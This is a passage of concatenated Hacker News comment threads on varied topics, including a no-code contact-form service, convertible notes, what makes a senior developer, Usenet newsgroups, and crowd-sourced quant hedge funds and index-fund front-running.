The next step is just to include in your html head a simple js link. And it's working.<p>The extension chrome and the javascript code is not ready to be in prod, but almost !<p>That's all.<p>My NoSmtp through by Mailjet and a paid plan of course, to emails reach their destination !<p>I came here to have your feedbacks, what's do you think about that ? It's something useless, not interesting ? or something that could be help some person ?<p>I made a demo for the wordpress plugin, that you can see here : https://www.youtube.com/watch?v=w-ZyaIiuEg8&feature=youtu.be
Another video will come for the chrome extension ^^<p>Thanks in advance :)<p>Link to the website : https://bit.ly/39r0Hvr
======
seanwilson
Try [https://formspree.io/](https://formspree.io/) (I've used this for around
5 years with zero issues, and it's super easy to set up) or
[https://www.typeform.com/](https://www.typeform.com/).
Google for something like "email contact form for static site" to find others.
I'm surprised there isn't a standard free one by now. There's a ton of others,
usually with a small free tier and then a modest paid tier price. The free
ones usually don't last long until they shut down.
Can you set Netlify to email forms without using Zapier? I can't get my head
around why Netlify don't make emailing a contact form a core feature - it's
essential to almost every business site.
~~~
NicolasRz_
Hey I didnt know formspree thanks !
Yes I can plug no smtp to any netlify
~~~
seanwilson
> Yes I can plug no smtp to any netlify
Hmm, had a quick look at no smtp and it looks like a similar same thing as
Formspree. Formspree has been around for a while now though and has a bigger
free tier so I'd side with that. Works on any website too, just paste the HTML
snippet in.
Like I mentioned, I've seen a ton of services like this come and go each time
I research this. I'm guessing they shut down when they don't make enough money
or get hit with spam/abuse, so I'd be cautious about using one that's not been
around for a while.
------
harshad_bn
Hello there,
My first question, Once the other method ie CF7 and Easysmtp are setupped then
there's no problem as such, then why there's such need. I am not convinced
that There's any need of Nostmp to that large extent. Let me know if I am
missing something here.
Next, sending email via extension is not a viable option. Either you can add
button which pops up the email interface would be good.
To make your extension and NoSmtp more valuable, you can add options to send
bulk email via extension for free upto 10,000 email, which is the limit of
mailjet if I am not wrong.
Thanks
~~~
NicolasRz_
Hello, thanks for reply !
Indeed CF7 and EasySmtp are great plugin. But I would like something easier.
But for example, like I said for easy smtp, I always have to ask gmail
credentials from my customer to setup it. And sometimes it's complicate.
And sorry for the explanation about the chrome extension. It's not clear I
see.
It's not an extension to send email ^^.
Imagine you have a static website online with only html/css/js And you don't
want yo have a backend or you don't know to code (to make an ajax call).
I purpose to include a simple js file (one of mine) And with the chrome
extension you can click on your inputs form to settup it. And that's all. It's
a no code way to have a working contact form without coding and without server
or smtp ^^
Maybe with a video it will be clearer
I keep in mind your idea about the extension :D
But like you said, maybe there are no need. I had this need but maybe I was
the only one haha.
------
auganov
Well, for customers I'd say that's a worse solution as they will now depend on
a potentially less-reliable 3rd party for something so simple. But who knows,
maybe for the sheer ease of installation some people will prefer that.
Wouldn't be surprised. You could probably add some more features on top of
this to make for a stronger value proposition.
As for the Chrome Extension I don't get what it's supposed to do.
------
sethammons
Disclaimer, I work with Twilio SendGrid.
SendGrid has a Wordpress plugin too, fwiw.
| {
"pile_set_name": "HackerNews"
} |
Bison 3.3 Released - edelsohn
https://lwn.net/Articles/777594/
======
azhenley
Discussion from yesterday:
[https://news.ycombinator.com/item?id=19007302](https://news.ycombinator.com/item?id=19007302)
| {
"pile_set_name": "HackerNews"
} |
Man coughed up an intact blood clot shaped like a lung passage - greenyoda
https://www.theatlantic.com/health/archive/2018/12/bronchial-blood-clot/577480/
======
masonic
A _36-year-old_ with end-stage heart failure?
| {
"pile_set_name": "HackerNews"
} |
Feds investigate why a Tesla crashed into a truck Friday, killing driver - ilamont
https://arstechnica.com/cars/2019/03/feds-investigating-deadly-friday-tesla-crash-in-florida/
======
elisharobinson
i can forgive the reporter for making a clickbait title, but atleast give the
news some time to rest and get all the facts . from the brief info provided in
the article only thing clear is that the driver was in the car when the
accident occured and that some agency is investigating the "accident" and not
the manufacturing units of the company , two very different things. minor
aside here it would behove media organizations to disclose the short or long
positions they have on any company they are reporting on.
| {
"pile_set_name": "HackerNews"
} |
Facebook Offers work like a charm. Here is proof! - acoyfellow
http://i.imgur.com/lvCSf.png
======
Casseres
It's just a poorly written ad. The add is for the realty company, but they put
the info of just one of their houses in the title to show what you can get.
| {
"pile_set_name": "HackerNews"
} |
The Target Isn’t Hollywood, MPAA, RIAA, Or MAFIAA: It’s The Policymakers - llambda
http://torrentfreak.com/the-target-isnt-hollywood-mpaa-riaa-or-mafiaa-its-the-policymakers-120205/?utm_source=dlvr.it&utm_medium=twitter
======
tzs
Flagged for idiotic use of the term MAFIAA. Normally it is just childish, like
M$ or crApple, but by using it along with MPAA and RIAA it also becomes
redundant.
~~~
Falkvinge
It was intended as "whatever you call them" rhetoric.
| {
"pile_set_name": "HackerNews"
} |
Sales-Driven Side Projects - lloydarmbrust
http://seeinginteractive.com/newspaper-support-group/sales-driven-side-projects/
======
necolas
By the article's own logic, the examples of Twitter and Gmail probably
wouldn't have come into being if they were sales-driven side projects.
I don't think Vinicius' article was making a general statement about side
projects being bad. His experience was that they can be dangerous distractions
while you are still in the "startup transition cycle".
~~~
jeremymims
\- Vinicius's article was great advice, so please don't consider this a knock
on it.
\- I wasn't really trying to outline sales-driven side projects in that part
of the article, merely successful ones.
\- For truly mature companies (ones who are out of the startup phase), side
projects are a healthy thing to encourage because they can afford to take
risks with their time and money. We were looking for a standard by which a
startup like ours could tackle a side project. This is the standard we hit on
that seems to be working for us. Of course there are others. And in different
kinds of companies with different kinds of cultures, we'd expect variation.
~~~
necolas
"We were looking for a standard by which a startup like ours could tackle a
side project." \- Thanks for the clarification.
------
gfodor
This is a good article, but it goes a bit too far. The concept of a sales
driven side project is a good one, but it's an _attribute_ of a side project,
not a _requirement_.
The value of this post is that it should bring into focus the two types of
side projects: those that are sales driven, and those that are not. Both have
their place when growing a company!
------
noworatzky
Can you tell us about what you are working on?
~~~
jeremymims
We're not really in the habit of announcing products before we've launched
them (although we've already pre-sold this product to several customers). If
you work with a newspaper we're not already working with, give us a call at
(888) 850-2497. We'll schedule a demo for you after we've launched our initial
customers.
------
trotsky
I think the developer version of this phrase is "getting the customer to pay
for R&D" or, more simply, consulting* .
It sounds like you're suggesting doing fixed price software development
bids... In my experience that's not a great way to avoid painful outcomes.
*with an ownership clause.
~~~
jeremymims
It might seem like it, but it's not. We won't build one-off projects and
nothing we do is a one-time fee. Almost everything we do (except for setup
fees and training fees) is recurring revenue. These projects have to be
generally applicable to our market and it must be sold to at least one of our
existing customers beforehand with others who have expressed interest.
If we were doing fixed price development bids, I would agree that we'd be
facing some serious pain down the road.
------
nobody_nowhere
Sales-driven everything.
~~~
yters
Son, sorry, you aren't bringing in the bucks in pre-school. You have a week to
increase sales or you're out on the street.
~~~
nobody_nowhere
Applejuice is for closers.
------
jay_kyburz
Can someday confirm, then let the author know that disqus comments make the
article unreadable on iPad because the text is covered with a big white
square. When it loads you cant see the text of the main body. I've seen it on
several blogs now.
~~~
jeremymims
Thanks for letting us know. We'll take a look.
~~~
jay_kyburz
It the disqus element up the top alongside the headline.
| {
"pile_set_name": "HackerNews"
} |
Bulk data collection vital to prevent terrorism in UK, report finds - jsingleton
https://www.theguardian.com/world/2016/aug/19/bulk-data-collection-vital-to-prevent-terrorism-in-uk-report-finds
======
jsingleton
The actual report (Report of the Bulk Powers Review) 192 pages [PDF]:
[https://www.gov.uk/government/uploads/system/uploads/attachm...](https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/546925/56730_Cm9326_WEB.PDF)
One from last year (A question of trust: report of the investigatory powers
review) 379 pages [PDF]:
[https://www.gov.uk/government/uploads/system/uploads/attachm...](https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/434399/IPR-
Report-Web-Accessible1.pdf)
Key points:
[https://www.theguardian.com/world/2015/nov/04/investigatory-...](https://www.theguardian.com/world/2015/nov/04/investigatory-
powers-bill-the-key-points)
BBC's take on it: [http://www.bbc.co.uk/news/uk-
politics-37130455](http://www.bbc.co.uk/news/uk-politics-37130455)
| {
"pile_set_name": "HackerNews"
} |
Dark Mode–Overhyped or Necessity? - tomayac
https://web.dev/prefers-color-scheme/
======
downrightmike
Necessity without a doubt. Without, My eyes burns and I start to get a
headache.
| {
"pile_set_name": "HackerNews"
} |
Angular-httpshooter - punkhaa
https://www.npmjs.com/package/angular-httpshooter
======
punkhaa
I developed this factory and it brings me a lot of control over the loaders
and UI changes, anyone else thinks it is useful?
| {
"pile_set_name": "HackerNews"
} |
The economics of awful blockbuster movies - hermanywong
http://qz.com/102902/the-economics-of-awful-blockbuster-movies/
======
elmuchoprez
This article seems to imply that there used to be some sort of highly
intellectual, dialogue driven summer blockbuster that we're moving away from
as a direct result of them not translating well to non-English speaking
audiences. Off the top of my head, I can't think of a single "intellectual"
summer blockbuster even years and years ago (maybe Forrest Gump?).
| {
"pile_set_name": "HackerNews"
} |
Thoughts on Convertible Notes - diego
http://k9ventures.com/blog/2011/03/22/thoughts-on-convertible-notes
======
grellas
A few thoughts:
1.As a general rule, founders like notes and investors do not. The reason
notes are more often used today than before is one of power and control.
Founders today have more bargaining power and can insist on going with notes.
Investors may not like this but, if they like a company and want to invest,
that is their option. This reflects a longer-term trend by which quality
startups have become easier to launch with comparatively smaller capital
needs, and this has enabled founders to keep more control through the early
stages of a company's growth. I believe this trend is becoming permanent,
which is one of the reasons for pg's observations about the predominance of
notes in today's climate.
2\. Building a startup is a teaming effort and the ideal cases consist of
founders and investors who work together to build a great company while
keeping their interests aligned. But this point only goes so far. Just ask any
desperate founder who is under a cash crunch how much investors are prepared
to give their cash on founder-friendly terms in the name of "alignment of
interests." At a basic level, the issue with funding centers about power and
control. Founders use notes because they can, and investors allow it because
they have no choice if they want to invest.
3\. The main advantage with notes is that they come with few strings. Once you
set up preferred stock, investors become a dominant (even if not controlling)
force within the company. Many things that you once had freedom to do you are
no longer free to do without investor consent, and that includes choices about
future funding. In addition, with notes, you don't have to reprice your stock
price or fool with such things as 409A valuations too early in the company's
history. With equity, you inject added costs and complications, and many
founders want to avoid that in the very early stages. Such things tend to be
distracting and tend to put more emphasis on fund raising as a process than
would otherwise be the case. Again, just ask the YC companies who are getting
the $150K notes with almost no strings attached. The main benefit: it lets
them concentrate up front more on building their products than if they had to
hustle up survival money right up front.
Bottom line: most founders will go with notes when they can because of power
and control and intangible factors such as alignment of interests with
investors, the educational value of learning to manage a board, etc. will not
normally sway them in the other direction.
All that said, this is a a splendid dissection of some of the key factors
affecting the use of convertible notes in early-stage funding. A very nice
piece.
~~~
daniel_levine
An ordered reply. I personally do not care note versus not, but am friendly
with many angels who do and think they have great points.
1\. Notes are worse for founders in most cases. Manu outlines why quite well.
Misalignment, downside protection only for investors w/ a cap, liquidation
preference, callable debt that can kill companies.
2\. Many of the best seed investors do not do notes anymore, so they're not
really allowing it. Founders appear to be using notes because of the opinions
of a few people, mostly investors themselves. The same bias should apply
there.
3\. I agree here, but then someone should come up with standard docs with no
strings (kinda like YC's Series AA docs). It will be a bit pricier but not
much. See Fred Wilson's post today.
Most founders go with notes because someone they trust has told them to not
because they have thought it out. And that's fine, but especially lately I
continue to hear more stories where founders have gotten screwed by notes.
In particular I recently heard about an Angel calling in their debt and
killing a Series A. That doesn't seem like what's best for the founders.
| {
"pile_set_name": "HackerNews"
} |
Jonathan Haidt on the moral mind - unignorant
http://www.ted.com/talks/jonathan_haidt_on_the_moral_mind.html
======
fnid
at 6:30, he mentions there are only small groups in nature, but neglects ants
and bees and others in the insect world.
| {
"pile_set_name": "HackerNews"
} |
Generating and Populating Caves in a Roguelike Game - jsnell
http://www.gridsagegames.com/blog/2016/03/generating-populating-caves/
======
Shoop
Brogue, another roguelike, has impressive level generation as well. Here's a
great interview with the developer about how it all works.
[https://www.rockpapershotgun.com/2015/07/28/how-do-
roguelike...](https://www.rockpapershotgun.com/2015/07/28/how-do-roguelikes-
generate-levels/)
~~~
yoklov
Wow, I've actually read through Brogue's level generation code, and this is an
excellent writeup. Makes many aspects of it much clearer!
| {
"pile_set_name": "HackerNews"
} |
Amygdala MKI is a robot in the form of a human-like limb - bryanrasmussen
http://marcodonnarumma.com/works/amygdala/
======
RodgerTheGreat
Seems rather heavy on thesis and light on execution. The footage in the video
doesn't do much to demonstrate that the robot learns or adapts; it mostly
appears to writhe around and recoil when it encounters resistance. Futher
iteration on the concept might prove interesting.
| {
"pile_set_name": "HackerNews"
} |
Does anyone still use Usenet? - gen3
I recently bought some bandwidth hoping to look around, but I am having a hard time finding any community with content. Did I just arrive to the party late? (Newsgroups that you used to follow would also be appreciated.)
======
simonblack
Yep.
This is my newsgroup list: Some of these groups have posts practically every
day, some have posts that are few and far between.
1 aus.computers.linux
2 comp.os.coherent
3 comp.os.cpm
4 comp.sys.northstar
5 comp.os.linux.misc
6 alt.os.linux.mint
7 alt.autos.mercedes
8 alt.os.linux.debian
My NNTP server is eternal-september, my articles-downloading software is
_slrnpull_.
My local handling of articles is a partial installation of _cnews_ , my news-
reader software is a slightly modified version of _tass_ , both of which were
originally components of my Coherent software installation.
------
pasttense01
The major use of Usenet currently is for file-sharing of copyrighted media.
It's safer than torrents if you only want to download--since for torrents you
are also uploading.
------
pwg
Yes. The following groups have some activity in them:
comp.lang.tcl, comp.misc, alt.os.linux.slackware, sci.crypt,
comp.os.linux.misc.
Many of the comp.lang.* groups have activity.
~~~
leed25d
talk.bizarre?
------
Simulacra
I tried accessing newsgroups for the first time in 20 years but was unable to
find a way in without paying. Is there a free way into Usenet?
~~~
pwg
Yes, if you want the textual discussions groups, then at least:
Eternal September ([https://www.eternal-september.org/](https://www.eternal-
september.org/))
or
AIOE: ([https://www.aioe.org/](https://www.aioe.org/))
are free possibilities.
| {
"pile_set_name": "HackerNews"
} |
Algorithms Notes for Professionals book - mithunmanohar1
http://goalkicker.com/AlgorithmsBook/
======
ocdtrekkie
These are actually pretty neat guides, I've found one of them pretty handy
before. Though I would like to see this site in particular add notes on when
they update these. They are "books", but they're updated like websites, but
with no notation of if they have been updated. So... if I have a local copy, I
have no way to know if it's out of date.
| {
"pile_set_name": "HackerNews"
} |
Browser DOM Api in JavaDoc style - snambi
http://krook.org/jsdom/
======
kodablah
You also have the (probably outdated) actual w3c javadoc [1] and GWT docs that
closely emulate the dom [2]. I believe yours is a tad bit more complete (and
not all_java related), but less documented.
1 - <http://www.w3.org/2003/01/dom2-javadoc/index.html> 2 - [http://google-
web-toolkit.googlecode.com/svn/javadoc/latest/...](http://google-web-
toolkit.googlecode.com/svn/javadoc/latest/com/google/gwt/dom/client/package-
summary.html)
~~~
snambi
The link is _not_ java api. It is javascript dom api available in the browser.
But, the API is documented in javadoc style. Ofcourse, w3c has more detailed
documentation. But it is hard to refer quickly. javadoc style api is very easy
to navigate and refer.
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Anybody who wants to start a project in the crypto space? - campingalert
Hey!<p>I do have a lot of time in the next two weeks and want to build something in the cryptospace. I am open for everything: Niche site, affiliate site, SaaS, app,...<p>Only condition: It should be profitable from the first week.<p>Ping me at [email protected] if you are interested :)<p>Regards,
Jakob
======
grizzles
profitable in the first week? I almost lol'ed until I saw "in the
cryptospace". You'll probably make 8+figs
~~~
campingalert
Are you interested in starting something together?
| {
"pile_set_name": "HackerNews"
} |
Researchers dismantle Mark Zuckerberg’s “meaningful interactions” argument - theBashShell
https://www.fastcompany.com/90300343/stanford-researchers-dismantle-mark-zuckerbergs-meaningful-interactions-argument
======
dontreact
I deactivated my Facebook as an experiment in response to this study. I was
already a very low volume user (uninstalled the app and almost never posted).
The effect size mentioned in the publication on subjective wellbeing was quite
small (.1 standard deviation approximately). So far the fear that I’m missing
something important, or that I will lose touch with someone I care about is
out weighing the benefits. However, I am seeing myself forge new connections
as well as strengthen some old ones. I think that if I can stay strong and
keep down this path I may start to see a net benefit.
~~~
flashgordon
So I have gotten over the FOMO by simply allowing FB to send me notification
emails to see if I have been tagged and so far nothing (been about a month).
If I am tagged then my filter is to only use the web version if I was tagged
by someone I cared about!
| {
"pile_set_name": "HackerNews"
} |
Ask HN: What constitutes a "Senior Developer"? - mgkimsal
There's been a few threads on hiring recently, and I've been a little surprised as to what constitutes "senior developer" status in some peoples' minds.<p>Do you have any particular criteria you use when applying that label to someone (or yourself)? If someone refers to themselves as a "Senior Developer", what characteristics do you look for right off the bat, whether in a resume or face to face?
======
hkarthik
It's all relative to your environment. A senior developer in one shop might be
one of the more junior guys in the next shop. Salaries also vary depending on
the market rates for the stack.
To me, deciding on whether someone's a Senior Developer depends on few things:
1) How much experience do they have in a stack similar to mine?
2) How much of their time would be spent learning versus doing?
3) How much of their time would be spent doing versus teaching?
Juniors learn a lot, Mid levels do a lot, Seniors teach a lot. Everyone's a
doer, but the difference between a senior and a mid level is that the senior
takes on the additional responsibility of teaching.
The next level is Lead, which is doing, teaching, and being held accountable
for others' success.
~~~
codeonfire
I don't really see what teaching has to do with it. Not every developer's goal
is to teach. The idea that he most capable developers should give up doing to
pursue teaching is not very good economics. This assumes that the optimum
balance is to have a well normalized force of average developers. In reality,
you need extreme outlier doers. It's only because management is not optimizing
for value creation that teaching is valued. They want a large growing number
of average subordinates, not a fixed amount of commandos.
------
kls
To me there are only a couple of factors that create what I consider to be a
senior:
First a large app under their belt, one in which they held an architecture
type role and designed the system.
Second, full stack knowledge, if they are doing web, that means HTML, CSS,
JavaScript, a REST API and back end language, and a database technology.
At this point I would consider them a Senior but specialized.
Once they know a few different options for each part of the stack I would
consider them to be a senior. For example knowing Dojo and jQuery for the
client, Node.js, ROR, and Java for the REST layer and back end, and several
relational and or NoSQL datastores.
In addition to that, they should know how to administer the infrastructure
that comes along with those stacks. Such as web servers, virtual etc.
Finally, they would have a SCM pattern down that works for them, they would
have a issue tracking, source control and documentation pattern that they can
adapt to projects.
To me those are the marks of a Senior Developer, but those are only the
ingredients a senior has to be able to parlay that knowledge into leadership
and creativity.
~~~
mgkimsal
How long do you think it would take most people to reasonably achieve those
milestones, and also retain competence in all of them? 2 years? 5 years? 10
years?
Personally, I'd done all those within 5 years (with one system I'd built and
administered almost from scratch doing north of $500 million in revenue per
year). But... I'm not sure I'd have called myself a senior developer at that
time. I think others did for job/work purposes, but I didn't self-identify
with that term.
I didn't feel comfortable calling myself a sr dev until I'd been able to
repeat the earlier successes multiple times over a few more years.
But... maybe that's just me.
~~~
kls
I think it is between the 5 to 10 mark. I think a lot of people realize that
they have hit the mark long after their talents have put them on it. For some
reason, people over assume competency in others in our industry. I think it
has something to do with the fact that smart people generally rate themselves
as less intelligent that they are perceived when self assessing. When I
reflected on my career, I realized that I was a senior for about 3 years
before I knew I was a senior. I don't know if that is standard but looking at
the guys I have mentored who have come of age it seems to be.
------
gharbad
It's a job title. It really doesn't mean anything other than that they are
likely making a bit more money than mid-level.
I've worked with junior/mid-level devs that are amazing and senior developers
that couldn't string three lines of code together.
------
kavi
Well, in Greece a _senior_ developer is a 28+-yo bald feller that f's his m0m
and is also an ugly code/idea stealer/plagiarizer from Day 1.
I'm 35 and still not considered a _senior_ developer (although I mentor two
junior guys). This is due to the fact that I get things done, something very
bad in the corrupt Greek state.
Cheers, <http://www.nkavvadias.com/hercules/>
------
stray
When hiring a developer, we call them "Senior Developer" so they'll ask the
_next_ company to pay them more money. We'd rather keep the money and pay
intangibles. Makes the shareholders happy and at the end of the day, that's
all that matters.
Turns out the extra ink on business cards is free.
~~~
ohashi
I am not sure whether I am impressed or appalled with this plan. I am
impressed if it keeps your talent from being poached. I also might be appalled
if everyone I met from your company was a senior developer and they didn't
seem to know much.
| {
"pile_set_name": "HackerNews"
} |
My Favorite Science Fiction (and Non-Fiction) Books - mojoe
http://compellingsciencefiction.com/blog/2016-12-18.html
======
unkeptbarista
I'll counter with:
1) Dune - Frank Herbert
2) Mote in God's Eye - Niven & Pournelle
3) The Lord of Light - Roger Zelanzy
4) Xeelee Series - Stephen Baxter (Or the Manifold: books)
5) The Well World Saga - Jack L. Chalker (Stick with the first 5 books)
~~~
mojoe
Thanks, I haven't read 3-5, I'll definitely check those out! Dune is
incredible, although it always felt a little too much like epic fantasy for my
tastes.
| {
"pile_set_name": "HackerNews"
} |
Advice to Someone Just Entering Our Industry - josephscott
http://perspectives.mvdirona.com/2016/11/advice-to-someone-just-entering-our-industry/
======
dba7dba
I'm nowhere as accomplished as the original author but let me try adding a few
other tips.
Plan on spending a lot of hours learning/practicing/tinkering to explore and
pickup new tech skills, OUTSIDE of your normal work hours. If you think you
want 9-5, Mon-Fri job, don't get into this. You won't last. Whatever task you
do will be automated or given to younger (aka cheaper) worker eventually. Or
the technology you use will become obsolete. Maybe you can last more than a
decade, but your compensation will not seem like a tech worker.
Basically, plan on being in a self-paced vocational school every few years.
A HN poster mentioned few months ago he was able get to the position of a CTO
by virtually having 2 full time jobs through out his career. One was his
normal 40hr/week job. The other job was also 40hr/week, but unpaid as he just
about spent that much time learning new tech skills.
| {
"pile_set_name": "HackerNews"
} |
A new sort of hedge fund relies on crowd-sourcing - miobrien
http://www.economist.com/news/finance-and-economics/21721946-amateur-coders-write-algorithms-compete-funds-new-sort-hedge-fund
======
stcredzero
Here's my "Tom Clancy movie plot" evil fund. Someone starts a fund that's
actually based on figuring out the portfolios of Senators, moderately high net
worth congresspersons and other Washington insiders. However, instead of
duplicating the entire portfolios of the whole populace, you first filter for
IQ, an age range where people are starting to be very well connected but still
making their fortunes, and develop another filter based on a quantitative
proxy for riskiness of each investment.
This is what the fund will really be based on, though there will be a fig leaf
fictional method advertised. The purpose of this is to piggyback on the
(technically-not) insider trading such people will manage to do while still
staying within the letter of the law. (Somehow, the collective portfolios of
US representatives manage to greatly outperform the stock market indexes.)
~~~
inputcoffee
This (insider trading by representatives) was common practice till the STOCK
act:
[https://en.wikipedia.org/wiki/STOCK_Act](https://en.wikipedia.org/wiki/STOCK_Act)
Check out the amendment in the last paragraph for more ideas for your Tom
Clancy movie.
~~~
ksherlock
it still is common practice.
[http://www.politico.com/story/2017/05/14/congress-stock-
trad...](http://www.politico.com/story/2017/05/14/congress-stock-trading-
conflict-of-interest-rules-238033)
------
chollida1
We've been seeing these quantopian fund stores for years now.
Where are the numbers? I mean at some point you have to produce right?
[https://news.ycombinator.com/item?id=12171843#12173142](https://news.ycombinator.com/item?id=12171843#12173142)
[https://news.ycombinator.com/item?id=12950276#12952666](https://news.ycombinator.com/item?id=12950276#12952666)
[https://news.ycombinator.com/item?id=12335272#12336086](https://news.ycombinator.com/item?id=12335272#12336086)
THe biggest issue I see for a quantopian fund is the "skin in the game" rule.
All of the successful fund managers I know have a very unhealthy portion of
their net worth in their own funds.
It's not clear to me that the quantopian algo designers will be able to, or be
forced to, put their own money into their strategies. I find "skin in the
game" to be one of the most promising alpha signals that still persists to
date.
~~~
zeppoleppo
This is an interesting comment as we have no way of validating how much money
designers are putting into their own algorithms.
I started building algorithms on Quantopian 2.5 years ago, using it as a way
to teach myself how to code because I come from a finance background and had
no coding experience. I now have a portfolio of algorithms that consistently
produce alpha (so far). My favorite algorithm does valuations and then buys
and holds for long periods of time. I don't actually invest any money into
this algorithm but rather use it as a prescreener for my own personal
investments. I have a significant amount of 'skin in the game' because of the
amount of time I have invested in developing my algorithms in addition to half
of my (very little) net worth being allocated based on the suggestions of my
algorithm.
I wouldn't be surprised if other designers were in the same boat. This is
purely anecdotal but I hope it helps.
~~~
Danieru
Do you know if there is something similar which can run against stocks traded
on the Japanese markets? I would love to write a pre-screener for myself.
------
creeble
Uh, isn't "the market" just the ultimate crowd-sourced fund?
~~~
jonbarker
The market is like a giant voting machine but not really a fund, since nobody
is managing it.
~~~
kgwgk
Index funds exist since the seventies.
~~~
jonbarker
Index funds actually still have a manager, whose only job is to rebalance
periodically and accurately.
------
inthewoods
I'll repeat what I've said before about these platforms - I don't see why any
institutional money would ever flow to them. Most startup funds require at
least 5 years of audited history before any capital allocator will touch them.
They might get some small quick money from fund-of-funds, but I think they'll
be hard-pressed to keep it. Given the relative short history on these
platforms and the likely churn in algos, I can't see anyone putting serious
money into them.
One of the other problems I see with these platforms is that there is nothing
that stops me, as far as I can tell, from pulling my algo from that platform
once it is successful. Now there are lots of reasons why I could see people
not doing that (running your own fund is hard, raising capital is difficult),
but I don't see why anyone that is successful wouldn't immediately exit the
platform in order to maximize their return.
~~~
Houshalter
For numer.ai you can't leave. The data you get is private and encrypted. So
even if you come up with a great algo, you depend on them to do anything with
it.
~~~
klipt
Unless some other fund buys the same expensive data?
------
quantgenius
The problem with Quantopian, many current robo-advisors (including some with
large valuations) and other market-related fintechs is that by and large they
don't seem to have anyone who has had real success actually trading automated
quantitative strategies at a serious hedge fund or tier-1 proprietary trading
group on their founding teams. I've seen successful VCs, well-known academics,
market gurus, people with a background in some aspect of running a mutual fund
and all manner of other people who seem like they should be good, but nobody
with an actual track record. I've seen people who worked on technology at
hedge funds but the technology group at a hedge fund builds what amounts to
plumbing like clearing, reporting etc, not the actual trading technology,
certainly nothing that can actually impact PNL.
Jonathan Larkin at Quantopian comes closest to what is needed and since he
joined Quantopian has certainly had good success, but even his experience was
more along the lines of recruiting and risk-managing portfolio managers, not
actually running a large book. He certainly helps Quantopian but Quantopian is
coming from a place where when it was founded, I personally had to explain
what selection bias meant to John Fawcett and despite Jonathan Larkin being
there, they still seem to be making some pretty basic mistakes in how the
platform is setup.
Spending a few years working on a tier-1 automated trading desk is absolutely
essential because, what is deployed at those firms (and what you are competing
with) is years if not decades ahead of academia and the rest of the industry
and you learn more in a week of working on a successful trading desk (which
only happens if you demonstrate a lot of not just academic aptitude), with
people sharing knowledge available nowhere else than in a decade in academia
or anywhere else, even other groups at the same firm, potentially sitting 10
feet away from the trading group. I'm not suggesting people steal IP or
anything like that but you do have to have sone sense of what the state-of-
the-art actually is if you are going to claim to have developed something
state of the art.
I suspect it's going to end up like the search space, where the space will be
taken over by the second generation of firms that nobody has heard of who
decide to do things differently from how investment management is currently
run offline taking advantage of their knowledge of how mutual funds including
index funds are picked off by sophisticated traders.
Interestingly, Igor Tulchinsky at Worldquant and his team who are a tier-1
trading shop have basically been running a very successful version of what
Quantopian hopes to become without a lot of hoopla or publicity for years,
decades if you include the time they were doing this as an independent team at
Millenium.
~~~
tanderson92
> how investment management is currently run offline taking advantage of their
> knowledge of how mutual funds including index funds are picked off by
> sophisticated traders.
This is news to me, I was not aware that most index funds are being front-run
to such a large degree. I understand it was possible with the Russell 2000
index at some point. But e.g. the Vanguard Total Market fund (CRSP index) has
almost identical performance to the Fidelity Total Market index fund (Dow
Jones Total Market). And both funds replicate the performance of e.g. the
Ibbotson book.
How is it possible that this is occurring if the index funds are being picked
off? Or do you mean style / sector index funds, not broad market?
~~~
quantgenius
I don't mean to be snarky but I fail to understand why you believe that the
fact that the Vanguard Total Market Fund has almost identical performance to
the Fidelity Total Market fund and that both funds replicate the performance
of e.g. the Ibbotson book is an argument either for or against my statement
that sophisticated traders are able to make lots of money due to the actions
of index funds. I don't mean to be snarky and I would really like to give you
a meaningful answer but I'm not sure how to proceed and I'd like to understand
why you believe the two have anything to do with each other so I can give you
a higher quality reply.
~~~
tanderson92
they follow different indices and have similar returns. Please explain how
this is possible while still underperforming what they 'should' be returning.
Are both indices being front-run? But if they reconstitute at different times
how is this possible.
And yes, you do sound snarky.
~~~
quantgenius
> they follow different indices and have similar returns. > Please explain how
> this is possible while still > underperforming what they 'should' be
> returning.
They are both equity indices and equities are highly correlated to each other.
The first principal component of global equity returns explains over 50% of
the variance.
> Are both indices being front-run?
Yes! If a stock is getting added (or dropped) from an index, this is typically
announced (depending on the index) between 3 days and a month before the date
on which the change to the index is made. The index itself is calculated
assuming you bought (or sold) precisely at the close on the day of the
reconstitution. Index fund managers are incentivized to match the index. They
actually do worse personally if they modestly outperform the index and
potentially get fired if they underperform. So every index fund manager wants
to buy (or sell) the stock entering (or leaving) the index at precisely the
same time on the same day. This means you could potentially have as much as a
few months trading volume wanting to transact on the same side at precisely
the same time. Smart traders take advantage of this by a) Buying (selling
short for deletes) the stock over time before the index is reconstituted. b)
Selling what they bought and short selling more (or buying) stock to the index
funds at the close and c) Covering their shorts (or selling the excess stock
bought) over the next few weeks. The fund managers don't care because even
though a typical proprietary trading desk makes tons of money doing this, as
far as their clients are concerned, they are matching the index. You could
move a stock 50% in the rebalance but you wouldn't notice if you were
comparing a fund's returns relative to the index.
This is fairly obvious if you simply take a look at price charts of stocks
entering and leaving indices around index reconstitutions. Academic studies
(use google scholar for a few dozen references) estimate that the typical
index addition or deletion to the S&P 500 index moves between 2-4% between
announcement and reconstitution. This is an underestimate of what actually
happens because adds/deletes are predictable and stocks start moving long
before the announcements are made. S&P 500 stocks are the most liquid stocks
on the planet and the effect is much larger for other indices. The Russell
indices are not much more or less gameable than other indices per add or
delete but the effects are concentrated since all Russell Index rebalances
happen on a single day (fourth Friday in June) which creates massive jumps in
PNL for proprietary trading desks right around that time.
It's also fairly obvious if you look at the data carefully that in recent
years with the increasing popularity of index funds, the indices are
understating the potential returns available in the stock market. The market
has done "better" than the oft-quoted returns on the indices would have you
believe.
> But if they reconstitute at different times how is this > possible.
Why would the timing of the reconstitution have anything to do with why this
is possible or not?
~~~
tanderson92
I explicitly avoided mentioning the S&P500. Why did you bring it up? It makes
your point nicely but I'm not talking about the S&P500 or the R2k as examples
where front running of any significance is happening. The index
additions/deletions in the Total Market indices happen at the margins: micro-
cap stocks (and IPOs). Hard to argue much happens of any effect with micro-cap
stocks.
I don't necessarily disagree with you on the S&P500 or R2k, but it's much
harder to make the same argument for total market indices.
Please justify how you are saying the market returns understate potential
market returns. If it is not an index you are using, what is it?
> Why would the timing of the reconstitution have anything to do with why this
> is possible or not?
Because they have similar returns and add/remove stocks at different times. If
Vanguard's total market fund adds a stock after Fidelity's, then any jump
("front-running") in share price due to Vanguard's purchases would be captured
in a higher return for Fidelity since it already owned the shares.
------
DennisP
Numerai is also doing this: [https://numer.ai/](https://numer.ai/)
------
theprop
I think I found a new interview question: write an algorithm that outperformed
